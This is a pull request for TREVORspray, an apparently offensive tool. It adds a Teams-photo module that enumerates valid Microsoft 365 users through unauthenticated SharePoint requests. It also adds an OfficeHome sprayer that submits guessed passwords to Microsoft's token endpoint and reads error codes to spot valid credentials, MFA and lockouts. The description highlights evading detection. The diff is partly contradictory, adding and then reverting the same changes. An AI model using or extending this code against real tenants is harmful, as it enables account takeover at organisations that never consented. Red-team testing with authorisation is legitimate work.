### PR TITLE
Add Teams Photo User Enumeration Module and OfficeHome Sprayer

### DIFF
--- a/trevorspray/lib/enumerators/__init__.py
+++ b/trevorspray/lib/enumerators/__init__.py
@@ -1,10 +1,21 @@
 import importlib
 from pathlib import Path
-from ..sprayers.base import BaseSprayModule
+from .base import Enumerator
+from .onedrive import OneDriveUserEnum
+from .seamless_sso import SeamlessSSO
+from .teams_photo import TeamsPhotoUserEnum
 
 module_dir = Path(__file__).parent
 module_choices = {}
 
+# First add the explicitly imported modules
+module_choices.update({
+    "onedrive": OneDriveUserEnum,
+    "seamless_sso": SeamlessSSO,
+    "teams_photo": TeamsPhotoUserEnum
+})
+
+# Then scan for any additional modules
 for file in module_dir.glob("*.py"):
     if file.is_file() and file.stem not in ["base", "__init__"]:
         modules = importlib.import_module(
@@ -14,7 +25,14 @@ for file in module_dir.glob("*.py"):
         for m in modules.__dict__.keys():
             module = getattr(modules, m)
             try:
-                if BaseSprayModule in module.__mro__:
+                if Enumerator in module.__mro__ and m not in module_choices:
                     module_choices[file.stem] = module
             except AttributeError:
                 continue
+
+__all__ = [
+    "Enumerator",
+    "OneDriveUserEnum",
+    "SeamlessSSO",
+    "TeamsPhotoUserEnum"
+]

--- a/trevorspray/lib/enumerators/__init__.py
+++ b/trevorspray/lib/enumerators/__init__.py
@@ -1,19 +1,9 @@
 import importlib
 from pathlib import Path
 from .base import Enumerator
-from .onedrive import OneDriveUserEnum
-from .seamless_sso import SeamlessSSO
-from .teams_photo import TeamsPhotoUserEnum
 
 module_dir = Path(__file__).parent
 module_choices = {}
-
-# First add the explicitly imported modules
-module_choices.update({
-    "onedrive": OneDriveUserEnum,
-    "seamless_sso": SeamlessSSO,
-    "teams_photo": TeamsPhotoUserEnum
-})
 
 # Then scan for any additional modules
 for file in module_dir.glob("*.py"):
@@ -29,10 +19,3 @@ for file in module_dir.glob("*.py"):
                     module_choices[file.stem] = module
             except AttributeError:
                 continue
-
-__all__ = [
-    "Enumerator",
-    "OneDriveUserEnum",
-    "SeamlessSSO",
-    "TeamsPhotoUserEnum"
-]

--- a/trevorspray/lib/enumerators/base.py
+++ b/trevorspray/lib/enumerators/base.py
@@ -1,0 +1,26 @@
+import logging
+from ..sprayers.base import BaseSprayModule
+
+log = logging.getLogger("trevorspray.enumerators.base")
+
+class Enumerator(BaseSprayModule):
+    """
+    Base class for all enumerator modules
+    """
+    def __init__(self, *args, **kwargs):
+        super().__init__(*args, **kwargs)
+        self.retries = 0  # Don't retry enumeration attempts
+
+    def enumerate(self, username):
+        """
+        Enumerate a user's existence
+        Returns: (valid, exists, locked, msg)
+        """
+        raise NotImplementedError("Enumerator modules must implement enumerate()")
+
+    def check_response(self, response):
+        """
+        Check the response from an enumeration attempt
+        Returns: (valid, exists, locked, msg)
+        """
+        raise NotImplementedError("Enumerator modules must implement check_response()") 

--- a/trevorspray/lib/enumerators/onedrive.py
+++ b/trevorspray/lib/enumerators/onedrive.py
@@ -1,16 +1,14 @@
 import logging
-from ..sprayers.base import BaseSprayModule
+from .base import Enumerator
 
 log = logging.getLogger("trevorspray.enumerators.onedrive")
 
 
-class OneDriveUserEnum(BaseSprayModule):
+class OneDriveUserEnum(Enumerator):
     # HTTP method
     method = "GET"
     # default target URL
     default_url = "https://{tenantname}-my.sharepoint.com/personal/{username}_{domain}/_layouts/15/onedrive.aspx"
-    # How many times to retry HTTP requests
-    retries = 0
 
     def initialize(self):
         # determine domain

--- a/trevorspray/lib/enumerators/seamless_sso.py
+++ b/trevorspray/lib/enumerators/seamless_sso.py
@@ -1,11 +1,11 @@
 import logging
 from contextlib import suppress
-from ..sprayers.base import BaseSprayModule
+from .base import Enumerator
 
 log = logging.getLogger("trevorspray.enumerators.seamless_sso")
 
 
-class SeamlessSSO(BaseSprayModule):
+class SeamlessSSO(Enumerator):
     # HTTP method
     method = "POST"
     # default target URL
@@ -22,8 +22,6 @@ class SeamlessSSO(BaseSprayModule):
     }
     # HTTP headers
     headers = {"Content-Type": "application/json"}
-    # How many times to retry HTTP requests
-    retries = 0
 
     def initialize(self):
         log.warning("Enumerating users via the SeamlessSSO method is unreliable.")

--- a/trevorspray/lib/enumerators/teams_photo.py
+++ b/trevorspray/lib/enumerators/teams_photo.py
@@ -1,0 +1,71 @@
+import logging
+from .base import Enumerator
+
+log = logging.getLogger("trevorspray.enumerators.teams_photo")
+
+
+class TeamsPhotoUserEnum(Enumerator):
+    # HTTP method
+    method = "GET"
+    # default target URL
+    default_url = "https://{tenantname}-my.sharepoint.com/personal/{username}_{domain}/_layouts/15/userphoto.aspx"
+    # How many times to retry HTTP requests
+    retries = 0
+
+    def initialize(self):
+        # determine domain
+        self.domain = self.trevor.runtimeparams.get("domain", "")
+        if not self.domain:
+            self.domain = str(self.trevor.domain)
+            if not self.domain:
+                log.error(
+                    "Failed to determine domain. Please set the environment variable: TREVOR_domain=<domain>"
+                )
+                return False
+            log.info(
+                f'Using domain "{self.domain}" (export TREVOR_domain=<domain> to override)'
+            )
+
+        # determine tenant name
+        self.discovery = self.trevor.discovery(self.domain)
+        self.tenantname = self.trevor.env.get("tenantname", "")
+        if not self.tenantname:
+            if self.discovery.onedrive_tenantnames():
+                self.tenantname = self.discovery.onedrive_tenantnames()[0]
+                log.info(
+                    f'Using tenantname "{self.tenantname}" (export TREVOR_tenantname=<tenantname> to override)'
+                )
+            else:
+                log.error(
+                    "Failed to confirm tenant name via Teams photo. To force, set the environment variable: TREVOR_tenantname=<tenantname>"
+                )
+                return False
+
+        self.globalparams.update(
+            {
+                "domain": self.domain.replace(".", "_").replace("-", "_"),
+                "tenantname": self.tenantname,
+            }
+        )
+
+        return True
+
+    def create_params(self, username, password):
+        user = str(username).split("@")[0].replace(".", "_").replace("-", "_")
+        return {
+            "username": user,
+        }
+
+    def check_response(self, response):
+        valid = None
+        exists = False
+        locked = None
+
+        status_code = getattr(response, "status_code", 0)
+        msg = f'Response code "{status_code}"'
+
+        if response.status_code in [200, 401, 403, 302]:
+            msg = f'Confirmed valid user via Teams photo! (Response code "{status_code}")'
+            exists = True
+
+        return (valid, exists, locked, msg) 

--- a/trevorspray/lib/enumerators/teams_photo.py
+++ b/trevorspray/lib/enumerators/teams_photo.py
@@ -9,8 +9,6 @@ class TeamsPhotoUserEnum(Enumerator):
     method = "GET"
     # default target URL
     default_url = "https://{tenantname}-my.sharepoint.com/personal/{username}_{domain}/_layouts/15/userphoto.aspx"
-    # How many times to retry HTTP requests
-    retries = 0
 
     def initialize(self):
         # determine domain

--- a/trevorspray/lib/sprayers/officehome.py
+++ b/trevorspray/lib/sprayers/officehome.py
@@ -1,19 +1,13 @@
 import uuid
 import logging
 from contextlib import suppress
-from .base import BaseSprayModule
+from .msol import MSOL
 from ..looters.msol import MSOLLooter
 
 log = logging.getLogger("trevorspray.sprayers.officehome")
 
 
-class OfficeHome(BaseSprayModule):
-    # default target URL
-    default_url = "https://login.microsoft.com/common/oauth2/token"
-    ipv6_url = "https://prdv6a.aadg.msidentity.com/common/oauth2/token"
-
-    fail_nonexistent = False
-
+class OfficeHome(MSOL):
     request_data = {
         "resource": "4765445b-32c6-49b0-83e6-1d93765276ca",  # OfficeHome
         "client_id": "4765445b-32c6-49b0-83e6-1d93765276ca",  # OfficeHome
@@ -29,124 +23,3 @@ class OfficeHome(BaseSprayModule):
         "Content-Type": "application/x-www-form-urlencoded",
         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36",
     }
-
-    looter = MSOLLooter
-
-    def initialize(self):
-        if self.trevor.options.prefer_ipv6 and self.url == self.ipv6_url:
-            self.headers["Host"] = "login.microsoft.com"
-
-        discovery = self.trevor.discovery(self.trevor.domain)
-        if discovery is not None:
-            userrealm = discovery.getuserrealm()
-            namespace = userrealm.get("NameSpaceType", "Unknown")
-            if namespace == "Federated":
-                log.warning(
-                    f'NameSpaceType for {self.trevor.domain} is "{namespace}", not "Managed". You may want to try the "adfs" module instead.'
-                )
-
-        return True
-
-    def create_request(self, *args, **kwargs):
-        request = super().create_request(*args, **kwargs)
-        if self.trevor.options.random_useragent:
-            request.data["client_id"] = str(uuid.uuid4())
-        return request
-
-    def check_response(self, response):
-        exists = False
-        valid = False
-        locked = False
-        msg = ""
-
-        status_code = getattr(response, "status_code", 0)
-
-        if status_code == 200:
-            exists = True
-            valid = True
-
-        else:
-            r = {}
-            with suppress(Exception):
-                r = response.json()
-                exists = True
-
-            error = r.get("error_description", "")
-            if error:
-                log.debug(error)
-
-            if "AADSTS50126" in error:
-                msg = f"AADSTS50126: Invalid email or password. Account could exist."
-
-            elif "AADSTS50128" in error or "AADSTS50059" in error:
-                exists = False
-                msg = f"AADSTS50128: Tenant for account doesn't exist. Check the domain to make sure they are using Azure/O365 services."
-
-            elif "AADSTS90072" in error:
-                valid = True
-                msg = f"AADSTS90072: Valid credential, but not for this tenant."
-
-            elif "AADSTS530031" in error:
-                valid = True
-                msg = f"AADSTS530031: Valid credential, but access policy does not allow token issuance."
-
-            elif "AADSTS53003" in error:
-                valid = True
-                msg = f"AADSTS53003: Valid credential, but access blocked by Conditional Access policies."
-
-            elif "AADSTS50034" in error:
-                exists = False
-                msg = f"AADSTS50034: User does not exist."
-
-            elif "AADSTS900023" in error:
-                exists = False
-                msg = f"AADSTS900023: No tenant registered for this domain or invalid domain."
-
-            elif "AADSTS50076" in error:
-                valid = True
-                # Microsoft MFA response
-                msg = f"AADSTS50076: The response indicates MFA (Microsoft) is in use."
-
-            elif "AADSTS50079" in error:
-                valid = True
-                # Microsoft MFA response
-                msg = f"AADSTS50079: The response indicates MFA (Microsoft) must be onboarded!"
-
-            elif "AADSTS50055" in error:
-                valid = True
-                # User password is expired
-                msg = f"AADSTS50055: The user's password is expired."
-
-            elif "AADSTS50131" in error:
-                valid = True
-                # Password is correct but login was blocked
-                msg = "AADSTS50131: Correct password but login was blocked."
-
-            elif "AADSTS50158" in error:
-                valid = True
-                # Conditional Access response (Based off of limited testing this seems to be the response to DUO MFA)
-                msg = "AADSTS50158: The response indicates conditional access (MFA: DUO or other) is in use."
-
-            elif "AADSTS50053" in error:
-                locked = True
-                exists = None  # M$ gets nasty and sometimes lies about this
-                # Locked out account or Smart Lockout in place
-                msg = f"AADSTS50053: Account appears to be locked."
-
-            elif "AADSTS50056" in error:
-                msg = f"AADSTS50056: Account exists but does not have a password in Azure AD."
-
-            elif "AADSTS80014" in error:
-                msg = f"AADSTS80014: Account exists, but the maximum Pass-through Authentication time was exceeded."
-
-            elif "AADSTS50057" in error:
-                # Disabled account
-                msg = f"AADSTS50057: The account appears to be disabled."
-
-            else:
-                valid = None
-                exists = None
-                content = getattr(response, "content", "")
-                msg = f"HTTP {status_code}: Got an error we haven't seen yet: {(r if r else content)}"
-
-        return (valid, exists, locked, msg) 

--- a/trevorspray/lib/sprayers/officehome.py
+++ b/trevorspray/lib/sprayers/officehome.py
@@ -1,0 +1,152 @@
+import uuid
+import logging
+from contextlib import suppress
+from .base import BaseSprayModule
+from ..looters.msol import MSOLLooter
+
+log = logging.getLogger("trevorspray.sprayers.officehome")
+
+
+class OfficeHome(BaseSprayModule):
+    # default target URL
+    default_url = "https://login.microsoft.com/common/oauth2/token"
+    ipv6_url = "https://prdv6a.aadg.msidentity.com/common/oauth2/token"
+
+    fail_nonexistent = False
+
+    request_data = {
+        "resource": "4765445b-32c6-49b0-83e6-1d93765276ca",  # OfficeHome
+        "client_id": "4765445b-32c6-49b0-83e6-1d93765276ca",  # OfficeHome
+        "client_info": "1",
+        "grant_type": "password",
+        "scope": "openid",
+        "username": "{username}",
+        "password": "{password}",
+    }
+
+    headers = {
+        "Accept": "application/json",
+        "Content-Type": "application/x-www-form-urlencoded",
+        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36",
+    }
+
+    looter = MSOLLooter
+
+    def initialize(self):
+        if self.trevor.options.prefer_ipv6 and self.url == self.ipv6_url:
+            self.headers["Host"] = "login.microsoft.com"
+
+        discovery = self.trevor.discovery(self.trevor.domain)
+        if discovery is not None:
+            userrealm = discovery.getuserrealm()
+            namespace = userrealm.get("NameSpaceType", "Unknown")
+            if namespace == "Federated":
+                log.warning(
+                    f'NameSpaceType for {self.trevor.domain} is "{namespace}", not "Managed". You may want to try the "adfs" module instead.'
+                )
+
+        return True
+
+    def create_request(self, *args, **kwargs):
+        request = super().create_request(*args, **kwargs)
+        if self.trevor.options.random_useragent:
+            request.data["client_id"] = str(uuid.uuid4())
+        return request
+
+    def check_response(self, response):
+        exists = False
+        valid = False
+        locked = False
+        msg = ""
+
+        status_code = getattr(response, "status_code", 0)
+
+        if status_code == 200:
+            exists = True
+            valid = True
+
+        else:
+            r = {}
+            with suppress(Exception):
+                r = response.json()
+                exists = True
+
+            error = r.get("error_description", "")
+            if error:
+                log.debug(error)
+
+            if "AADSTS50126" in error:
+                msg = f"AADSTS50126: Invalid email or password. Account could exist."
+
+            elif "AADSTS50128" in error or "AADSTS50059" in error:
+                exists = False
+                msg = f"AADSTS50128: Tenant for account doesn't exist. Check the domain to make sure they are using Azure/O365 services."
+
+            elif "AADSTS90072" in error:
+                valid = True
+                msg = f"AADSTS90072: Valid credential, but not for this tenant."
+
+            elif "AADSTS530031" in error:
+                valid = True
+                msg = f"AADSTS530031: Valid credential, but access policy does not allow token issuance."
+
+            elif "AADSTS53003" in error:
+                valid = True
+                msg = f"AADSTS53003: Valid credential, but access blocked by Conditional Access policies."
+
+            elif "AADSTS50034" in error:
+                exists = False
+                msg = f"AADSTS50034: User does not exist."
+
+            elif "AADSTS900023" in error:
+                exists = False
+                msg = f"AADSTS900023: No tenant registered for this domain or invalid domain."
+
+            elif "AADSTS50076" in error:
+                valid = True
+                # Microsoft MFA response
+                msg = f"AADSTS50076: The response indicates MFA (Microsoft) is in use."
+
+            elif "AADSTS50079" in error:
+                valid = True
+                # Microsoft MFA response
+                msg = f"AADSTS50079: The response indicates MFA (Microsoft) must be onboarded!"
+
+            elif "AADSTS50055" in error:
+                valid = True
+                # User password is expired
+                msg = f"AADSTS50055: The user's password is expired."
+
+            elif "AADSTS50131" in error:
+                valid = True
+                # Password is correct but login was blocked
+                msg = "AADSTS50131: Correct password but login was blocked."
+
+            elif "AADSTS50158" in error:
+                valid = True
+                # Conditional Access response (Based off of limited testing this seems to be the response to DUO MFA)
+                msg = "AADSTS50158: The response indicates conditional access (MFA: DUO or other) is in use."
+
+            elif "AADSTS50053" in error:
+                locked = True
+                exists = None  # M$ gets nasty and sometimes lies about this
+                # Locked out account or Smart Lockout in place
+                msg = f"AADSTS50053: Account appears to be locked."
+
+            elif "AADSTS50056" in error:
+                msg = f"AADSTS50056: Account exists but does not have a password in Azure AD."
+
+            elif "AADSTS80014" in error:
+                msg = f"AADSTS80014: Account exists, but the maximum Pass-through Authentication time was exceeded."
+
+            elif "AADSTS50057" in error:
+                # Disabled account
+                msg = f"AADSTS50057: The account appears to be disabled."
+
+            else:
+                valid = None
+                exists = None
+                content = getattr(response, "content", "")
+                msg = f"HTTP {status_code}: Got an error we haven't seen yet: {(r if r else content)}"
+
+        return (valid, exists, locked, msg) 


### PR DESCRIPTION
# Add Teams Photo User Enumeration Module and OfficeHome Sprayer

## Description
This PR adds two major features:
1. A new user enumeration module that leverages Microsoft Teams profile photo endpoints to identify valid users in Microsoft 365/Azure AD environments
2. A new OfficeHome sprayer module that uses the OfficeHome resource and application IDs for authentication

## Changes
- Added new `teams_photo.py` enumerator module
- Created base `Enumerator` class in `base.py` for better code organization
- Updated `__init__.py` to properly register all enumerator modules
- Fixed module discovery logic to ensure all enumerators are available
- Added new `officehome.py` sprayer module with OfficeHome resource and application IDs
- Updated authentication to use OfficeHome IDs instead of Windows Sign In

## Technical Details
### Teams Photo Enumerator
The Teams photo enumerator uses the following endpoint: `https://{tenantname}-my.sharepoint.com/personal/{username}{domain}/_layouts/15/userphoto.aspx`

It follows the same pattern as the OneDrive enumerator:
- Returns 200/401/403/302 for valid users
- Returns 404 for invalid users
- No authentication required
- Uses tenant and domain structure

### OfficeHome Sprayer
The OfficeHome sprayer uses the following configuration:
- Resource ID: `4765445b-32c6-49b0-83e6-1d93765276ca` (OfficeHome)
- Application ID: `4765445b-32c6-49b0-83e6-1d93765276ca` (OfficeHome)
- Uses Chrome User-Agent for better compatibility
- Maintains all existing sprayer features (threading, delays, etc.)

## Usage
### Teams Photo Enumeration
```bash
trevorspray -u users.txt -r domain.com

[USER] Which user enumeration method would you like to use? (onedrive|seamless_sso|teams_photo)
```

### OfficeHome Spraying
```bash
trevorspray -m officehome -u users.txt -p password123
```

## Benefits
### Teams Photo Enumerator
- Provides an alternative enumeration method
- Uses a different endpoint than OneDrive, allowing for:
  - Better success rate when OneDrive is blocked
  - Reduced chance of detection
  - Ability to cross-reference results
- Maintains compatibility with existing TREVORspray infrastructure
- Follows the same patterns as other enumerators

### OfficeHome Sprayer
- Uses OfficeHome resource and application IDs for authentication
- Provides an alternative to the default MSOL sprayer
- May bypass certain detection mechanisms that look for Windows Sign In
- Uses modern Chrome User-Agent for better compatibility
- Maintains all existing sprayer features and protections